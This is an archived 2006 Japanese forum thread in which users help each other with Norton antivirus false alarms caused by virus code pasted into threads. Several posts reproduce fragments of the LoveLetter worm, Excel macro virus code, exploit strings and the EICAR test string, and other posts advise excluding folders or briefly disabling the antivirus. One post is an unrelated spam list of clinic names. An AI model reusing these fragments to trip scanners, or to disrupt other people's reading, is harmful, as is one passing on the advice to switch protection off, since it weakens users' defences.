06/09/10 22:30:08
>>662
> 2chブラウザのログ保存フォルダとは、どこにあるのでしょうか。
使っている2ch専用ブラウザによって違います。
専用ブラウザを使っていない人には関係ありません。
> 除外に認定とは、何の除外に認定すればいいのでしょうか。
ウイルス対策ソフトの検知対象から除外するように設定します。
やり方はウイルス対策ソフトによって違います。
除外設定(「認定」ではなく「設定」)ができないウイルス対策ソフトもあります。
> これだけでは全く意味がわかりません。
以上の説明で全く意味がわからないなら、当面は気にする必要ありません。
実際にその現象に遭遇すれば自然とわかるようになるでしょう。
665:662
06/09/11 19:21:09
>>664
ミミ ヽヽヽヽリリノノノノ
ミ ,,、,、,、,、,、,、,、、 彡
r、r.r 、l i''" i彡
r |_,|_,|_,|| 」 /' '\ |
|_,|_,|_,|/⌒/ -・=-, 、-・=-│
|_,|_,|_人そ(^i ノ( 、_, )ヽ | ・・・で?
| ) ヽノ |. ノ !! |
| `".`´ ノ ノ ̄i |
人 入_ノ´ ヽニニノ ノ\
/ \_/\\ /|\\
/ \ ト ──イ/ ヽヽ
666:ひよこ名無しさん
06/09/13 01:41:38
■2ちゃんねる 初心者が安心して質問できるスレッドガイダンス (ノートントラップ全般への対策法)
URLリンク(ansitu.xrea.jp)
■2ch NIS問題まとめページ
URLリンク(mickey.mirv.net)
■特定のドライブ、フォルダ、ファイルをウイルススキャンの対象から除外する方法
URLリンク(service1.symantec.com)
・上記設定でまだ反応がある場合は、「専ブラプログラムフォルダ丸ごと」も同様に除外に追加してみて下さい。
・2ちゃんねる専用ブラウザの読み込み禁止単語機能に、
「v bs」、「O nload」、「o nload」、「=w indow」、「L OVE-LETTER」、「M acro」、「n osuch」、「E ICAR-STANDARD-ANTIVIRUS-TEST」
などの 単語を登録しておきましょう。(※ 単語の途中一箇所スペース空けてるんで詰めて登録して下さい)
・各専用ブラウザのスレッド情報も参照して下さい。
・NIS(NPF)のファイアーウォールを誤作動させるコード文字列に関して → 応急対策を参照
・タスクトレイのノートンアイコンをクリック → NISを無効にする (5分) →
NIS無効中に専用ブラウザでスレッドをリロード取得 → NISを有効に戻す (※この方法でもNPFトラップ回避可能)
■いきいき Wiki - ノートンインターネットセキュリティに関するFAQ
URLリンク(info.2ch.net)
667:ひよこ名無しさん
06/09/13 18:00:04
Norton Anti Virus 2003です。
>専用ブラウザのログ保存フォルダを「除外」に設定。
オプション→Norton Anti Virus→除外→新規→項目→フォルダが開いているアイコン→フォルダの参照から2chブラウザのログ保存フォルダを選んでクリック→項目のOKをクリック。
>◆2004/2003はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をしてください。
手動で探しても、ウイルスソースが貼られたログは自動的に破棄されてしまっているので.datを選択することができません。idxだけ保存されていますが除外しても変わりなしです。
どうすれば見れるようになりますか?
668:ひよこ名無しさん
06/09/14 18:29:19
>>667
自分が引用してる文章をよく読めばわかるだろうが
datやidxなどの「ファイル」を除外するのではない
「フォルダ」を正しく除外していればログが自動的に破棄されることはない
669:ひよこ名無しさん
06/09/14 20:59:51
>>668
言われてやっと気付きました。ありがとうございます
670:ひよこ名無しさん
06/09/14 22:06:23
Norton Anti Virus 2004を使用しています。
手動スキャンとAuto-ProtectでLogフォルダの除外と
URLリンク(mickey.mirv.net) ←の対処はしてありますが、
たまーに一部のウイルスソースに引っかかってしまいます。
そうなると、しばらくインターネットセキュリティを無効ししないとならなくなります。
例えば最近だと、下記のウイルスソースです。
両方なのか、片方なのか分かりませんがウイルス警告がでます。
対処方法はありますか?
671:670
06/09/14 22:06:56
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz) type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
672:670
06/09/14 22:07:27
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
673:670
06/09/14 22:08:40
といった感じのものです。
671か672かは分かりませんがノートンが反応してしまいます。
674:670
06/09/14 22:20:18
今やってみたのですが671と672ではノートンは反応しませんでした。
すいません、他のやつだったのかな?
675:ひよこ名無しさん
06/09/14 23:24:15
>>673-674
貼るな
他人の迷惑も考えろ。
676:<body onload=window()>
06/09/14 23:57:48
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
677:670
06/09/15 09:02:47
>>675
スマン
>>676だと何にも反応しないんだよな
反応するときはなんなのかな?
678:ひよこ名無しさん
06/09/15 12:41:38
>>677
下から二行目
679:ひよこ名無しさん
06/09/16 04:32:07 uZM1h+BC
Norton Anti Virus2003でWinXP/IE6。Live2chです。
ノートン入れたら~のWikiを見て、
Norton AntiVirusのオプション→システム>Auto-Protect>除外→C:\Program Files\Live2ch\logフォルダを追加。
手動スキャンにも同じようにログを除外しました。
ですが専ブラを再起動させてみてもログを取得し直して見ても、このスレや他にウイルスが貼られているスレでもウイルス警告が出てきます。
間違っていないと思うのですがどうしてでしょうか…。教えてください。
680:ひよこ名無しさん
06/09/16 05:02:15
>>679
>>643 辺りの件は対策しましたか?
NAVでも誤反応します。
681:679
06/09/16 05:06:27
すみません解決です
除外指定するのはlog保存フォルダじゃなくインストールフォルダ自体のことだったんですね
>>680
ありがとうございます
参考になりました
682:ひよこ名無しさん
06/09/17 06:36:54
携帯厨よけの誤反応作ってくれ
スレが携帯からのガキだらけで機能しなくなっちまった
683:ひよこ名無しさん
06/09/26 11:45:24
2007では対応したの?
684:ひよこ名無しさん
06/09/30 14:45:45
test
685:ひよこ名無しさん
06/10/01 12:02:45
>658タソのをしても反応するし2ちゃんねるのIPアドレスを除外
しても設定しても反応するし>17タソのプログラムは問題があるとかで
途中で動かなくなるしでハラ立ってきたんで
ワーム防止を黙らせたった(ノ`□´)ノ≡≡≡≡≡≡≡≡┻━┻
686:ひよこ名無しさん
06/10/02 08:02:14 q3VL2ORv
管理者がサクージョ&規制すればいい。
専ブラ使ってる漏れとしては迷惑。
687:ひよこ名無しさん
06/10/04 04:23:42
>>686
誤反応するような不便なソフトは
淘汰されて滅びたほうがいい、という考え方らすい
688:ひよこ名無しさん
06/10/04 06:54:44
test
689:cen ◆Am9xOgNMYE
06/10/05 00:10:23
>>17のソフトですが、バージョンが2.00になりました。
URLリンク(www.geocities.jp)
>>685
どういう状況か教えてもらえますか?
690:ひよこ名無しさん
06/10/05 15:00:29 Qin047IX
ノートン使えねえから今日からバスターにしましたぁ
691:ひよこ名無しさん
06/10/05 16:59:52
>>689
GUIになったのはいいけど.NET Frameworkが必要なければもっとよかったなぁ。
PCがしょぼいからできるだけ余計なものは入れたくないんだよね。
ウチでは古いバージョンの方を使わせてもらうことにします。
692:cen ◆Am9xOgNMYE
06/10/06 01:17:30
>>691
使っていただいてありがとうです。
.NET Frameworkを使わない前のバージョンの方が起動
が早いですね。
まあ、Visual C#で割と楽にGUIが作れるいうのが理由です^^;
693:キーワード
06/10/06 02:48:50
<body onload=window()>
eip = eip + unescape("%u7030%u4300")
p + w * 10 <br> End Sub <br>
LOVE-LETTER-FOR-YOU
dirsystem&"\MSKernel32.vbs
ms-its:mhtml:file://C:
its:mhtml:file://c:\
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines
kak.hta';ken=wd+'ST
Set A4 = A1.CreateTextFile(A1.BuildPath
ToInfect.CodeModule.InsertLines BGN
694:ひよこ名無しさん
06/10/06 03:37:15
>>693 キーワード NGワード
695:ひよこ名無しさん
06/10/06 18:12:11
ウィルスコードの適当な文字をNGワードに設定しとくとかじゃダメなの?
スレッドをダウンロードするからNGワードとか無意味?
696:ひよこ名無しさん
06/10/06 20:46:48
大空寺系には反応しなくなったけど、
OnLoad Rte CodeExec
なんとかならんかなぁ
697:ひよこ名無しさん
06/10/07 12:12:01
あほ
698:ひよこ名無しさん
06/10/07 23:00:36
ほす
699:ひよこ名無しさん
06/10/08 00:17:50
いい加減ウザくなったしどうせ更新時期だったからノートン先生からバスターに切り換えてみた。
確かに反応はしなくなったけど、何らかの不都合ってあるのかな。
700:ひよこ名無しさん
06/10/08 01:30:54
どなたかマカフィ誤作動の解除方法教えてください。
701:ひよこ名無しさん
06/10/12 00:38:44
ノートン先生がもうすぐ更新なんですが、
なんか、うっとうしいから今度は別のメーカーにしたいのですが・・・お勧め教えてください。
ちなみに、なぜか、Cドライブの空きは8%ぐらいしかない
とんでもないPCです。
702:経営学部の学生 ◆2H3Xipoq6Y
06/10/12 04:12:22
個人的にはジャストシステムから11月に発売のカスペルスキー6かな?
いまライフボートから出てるカスペルスキー5を買っても6が出たらアップデートできるみたいだし
703:ひよこ名無しさん
06/10/13 04:39:42
Norton Anti Virus2006を使っています。
>>658の操作中、「現在、AutoBlockで遮断しているコンピュータ」
のところに何もアドレス等が載ってないのですが
どうすればこの先誤反応解除の操作を進められるんでしょうか。
704:ひよこ名無しさん
06/10/13 09:16:01
>>703
専用ブラウザのフォルダごと全て除外にしたら俺は止まったよ
同じNorton Anti Virus2006だけど
705:ひよこ名無しさん
06/10/13 09:28:32
>>703
なにも載ってないってことは
丁度そのときに遮断されてないのだから解除する必要はない。
前半の設定ができていれば問題ないのでは?
>>704
その設定で止まるやつと
インターネットワームの誤反応とは別物だよ。
706:ひよこ名無しさん
06/10/13 12:10:09 yCzxUbTg
ノートンがVBS.Freelink.Bというウイルスに反応したのですが、
ウイルス警告のウインドウが消しても消しても出てきます。
どうすればいいのでしょうか?
707:ひよこ名無しさん
06/10/13 15:07:54 cPKv8TOO
NIS2006
winSP sp2
2chスレ読み込んだら「コンピュータを攻撃するうんぬん」ってメッセージが出てその板が一定期間
アクセス不可になる現象。回避策ある?
708:ひよこ名無しさん
06/10/13 15:15:38
ちなみにURLリンク(mickey.mirv.net)にはNIS2006の対象砲は書いてない、、><
709:ひよこ名無しさん
06/10/13 17:48:31
ane doe style2.41 WinXPsp2使用
Norton Internet Security2004 Norton AntiVirus2004使用
Jane doe style2.41のログを除外しているのですが
ウイルスコードが貼られてる板を開くと
「エラー」と表示され、ログを取得できません
それで、いつもNorton Internet Security2004を無効にして
その板を開くと、思ったとおりウイルスコードが張られています
この状態になると、何分間か、その板を開く事が出来なくなります
ログの除外をしているのに、なぜこうなるのでしょうか?
710:ひよこ名無しさん
06/10/13 19:22:08
>>709
設定を間違ってる
711:ひよこ名無しさん
06/10/13 19:57:21
>>710
C\Program Files\Jane Style\Logs\2ch
なんですが、間違ってるのでしょうか?
712:ひよこ名無しさん
06/10/13 21:08:55
経営学部の学生さん>>701です。
ありがとうございました。
11月まではノートン先生が頑張ってくれそうなので、
その後の購入の参考にします。
713:ひよこ名無しさん
06/10/13 23:09:01
>>709
一定時間板が開けなくなる件の誤反応はログフォルダ除外では対応できません。
2chを見ようとすると「侵入を検出して遮断しました。」というダイアログが表示されて
2chを見れなくなってしまう問題のまとめページ。
URLリンク(mickey.mirv.net)
NAVの人は下記スレの698辺りから参照
ノートン誤作動対策本部
URLリンク(qb5.2ch.net)
>>707 NIS2006はよくわからないけど上のリンクとスレ参考にしる。
714:ひよこ名無しさん
06/10/14 00:28:20
>>713
ありがとうございます。
教えて頂いたURLリンク(mickey.mirv.net)を
やってみて、まただめな様なら
また来ます。ありがとうございました。
715:ひよこ名無しさん
06/10/14 14:20:25
ノートンが反応して、偽ウイルスを削除した場合
何かPCに問題は起こるんですか?
716:715
06/10/14 14:25:05
ウイルスを削除というか、駆除できずにファイル(?)ごと削除してるんですけど。。。
ご指導お願いします。
717:ひよこ名無しさん
06/10/14 14:35:27
>>715
起こらない
>>716
2chのログファイル、またはIEキャッシュファイルを監視対象から除外
718:715
06/10/14 14:41:13
>>717
ありがとうございます。
具体的には、何を削除しているのでしょうか。
例えば、以下のようなものが削除されてしまいます。
Documents and Settings \ 名前 \ Local Settings
\ Temporary Internet Files \ Content IES \ SOUTTMDI2 \ l50[1].htm
719:ひよこ名無しさん
06/10/14 17:15:19
>>718
IEキャッシュファイル
720:715
06/10/14 19:03:51
てことは削除されてもまったく問題ないんですよね?
ありがとうございました!
721:ひよこ名無しさん
06/10/16 19:13:08
VShieldを有効にするってどうしたらいいんですか?
722:ひよこ名無しさん
06/10/17 12:47:03
>>257
自分も>>259さんと同じで
こういうの貼られてたら、暫く板が開けなくなります・・
【質問】
1:ノートン使って専ブラで見ている人は、みんな実行しているのでしょうか?
2:そこでやはり↓のサイトの対処法をしないといけないのでしょうか?
URLリンク(mickey.mirv.net)
いまいち、やるのが怖くて躊躇しているのですが・・
(ウイルスとかが)
WinXPsp2 Jane doe style2.41を使っています
723:ひよこ名無しさん
06/10/17 20:07:44
別に怖いことないと思うが。
設定の意味がわからないとか漠然とした不安があるのでしょうか。
抵抗があるなら>>689にある誤反応スクリプト無効化ソフトを使って
その都度対処すれば良いと思います。
724:ひよこ名無しさん
06/10/17 23:17:55
実行しなければ自分が不便な思いをするだけ
不便でも構わない、
危険はないと説明されても納得できない、
とにかく怖いというなら好きにすれば?
725:ひよこ名無しさん
06/10/22 10:00:55
保守
726:ひよこ名無しさん
06/10/28 17:40:52 RthPMJHm
2007は誤反応しなくなったんですか?
エロイ人教えて
727:ひよこ名無しさん
06/11/03 06:52:18
保守
728:私立の中学生 ◆N30ctwWJLw
06/11/04 20:07:16
バスターという最高のアンチウィルスがありながらどうして人はノートンを選ぶんだろう
729:ひよこ名無しさん
06/11/05 03:48:08
最高のアンチウィルスw
730:ひよこ名無しさん
06/11/07 01:49:05
誘導
731:ひよこ名無しさん
06/11/07 12:15:11
>>728
バスターはOSを起動できなくしたという前科があるからいまいち信用できない。
732:ひよこ名無しさん
06/11/13 16:36:48 286EntMo
>>728
>>731
前科どころか、2007は起動時にOSごとフリーズさせる実績があるから
たとえ誤反応が多くても、農豚をオススメする。
733:ひよこ名無しさん
06/11/16 10:01:34 ajN9y2Qm
なんかメジャーじゃない誤反応ソースないかなー
734:ひよこ名無しさん
06/11/16 10:40:15
URLリンク(www.google.co.jp)
735:ひよこ名無しさん
06/11/17 10:54:47
ノートンのウィルス誤反応警告の表示警告がここ2、3日で変わったのは自分だけ?
念のためにプロバイダサービスによるマカフィーも使って調べても、
ウィルスなど異常が見受けられなかったのに。
736:ひよこ名無しさん
06/11/18 14:53:59
恵比寿視力回復研究所八王子クリニック大塚美容形成外科・歯科今泉ハートクリ
ニック朝日大学歯学部附属村上記念病院加藤内科クリ
ニックあんのうらクリニック今津赤十字病院佐賀県立病院好生館安芸市民病院お
きた内科クリニックしお医院静岡県立総合病院相生山
病院愛知県がんセンターあきしまクリニック岩崎病院高茶屋診療所国立病院機構
三重中央医療センター井上記念病院小倉台柏戸クリニ
ックうたせメディカルクリニックたちばな台病院青葉台病院恵比寿視力回復研究
所八王子クリニック大塚美容形成外科・歯科今泉ハー
トクリニック朝日大学歯学部附属村上記念病院加藤内科クリニックあんのうらク
リニック今津赤十字病院佐賀県立病院高月整形外科好
生館安芸市民病院おきた内科クリニックしお医院静岡県立総合病院相生山病院愛
知県がんセンターあきしまクリニック岩崎病院高茶屋
診療所国立病院機構三重中央医療センター井上記念病院小倉台柏戸クリニックう
たせメディカルクリニック橋本内科医院市立芦別病院
北海道立本岐こじま内科額賀医院よこぎ内科胃腸科クリニック平中央医院いわき
市国民健康保険田人診療所中野中央病院佐藤医院野崎
整形外科医院高木医院木村クリニック洋向台クリニックくさの内科・眼科すけが
わ内科クリニック額賀医院草野医院下遠野内科胃腸科
737:ひよこ名無しさん
06/12/18 04:28:15 X+EF3ZXu
昨夜から急にanime鯖だけ繋がらなくなりました。
原因を探していたら、このスレを見つけたので質問させて下さい。
使用ソフト、NortonAntiVirus2006
2ch閲覧環境、IE6.0とOpenJane
症状、anime鯖の閲覧不可
専ブラでのエラー報告、SocketError#10065 Norou te to host.
誤反応スクリプト無効化ソフト導入と除外設定は済ませています。
試しにAuto-Protectをオフにしてみたのですが、それでも閲覧できませんでした。
どうすれば問題を解決できるんでしょうか。どなたかアドバイスお願いしますorz
738:737
06/12/18 05:25:17
自己解決しました
30分規制にかかっていただけみたいです
739:ひよこ名無しさん
06/12/19 05:26:43 PWq98QOy
ログフォルダは除外していたのですが、2chのスレを開いてて
ウィルス警告が出たので、またいつもの誤反応だと思い。
Temporary Internet Filesをスキャンしたら1158448744[1].htm にVBS.Freelink.B
が見つかって「検疫」「削除」をしても駆除できません。
これもただの誤反応なのでしょうか?
740:ひよこ名無しさん
06/12/19 17:32:58
ただの誤反応です
専ブラではなくIEでスレッドを閲覧したのが原因で、
>>1に書いてある通り、別に心配ありません
Temporary Internet Filesを除外したりしてはいけません
(>>1以下、テンプレの各リンク先もよく読みましょう)
741:ひよこ名無しさん
06/12/20 18:18:36
ノートンを2007に更新したらいろいろ探してもノートントラップを防ぐための
セキュリティから除外する方法がわからないんですが、どうやってノートントラップを防げばいいんですか?
742:ひよこ名無しさん
06/12/20 20:25:49
これは?
スレリンク(sec板:12番)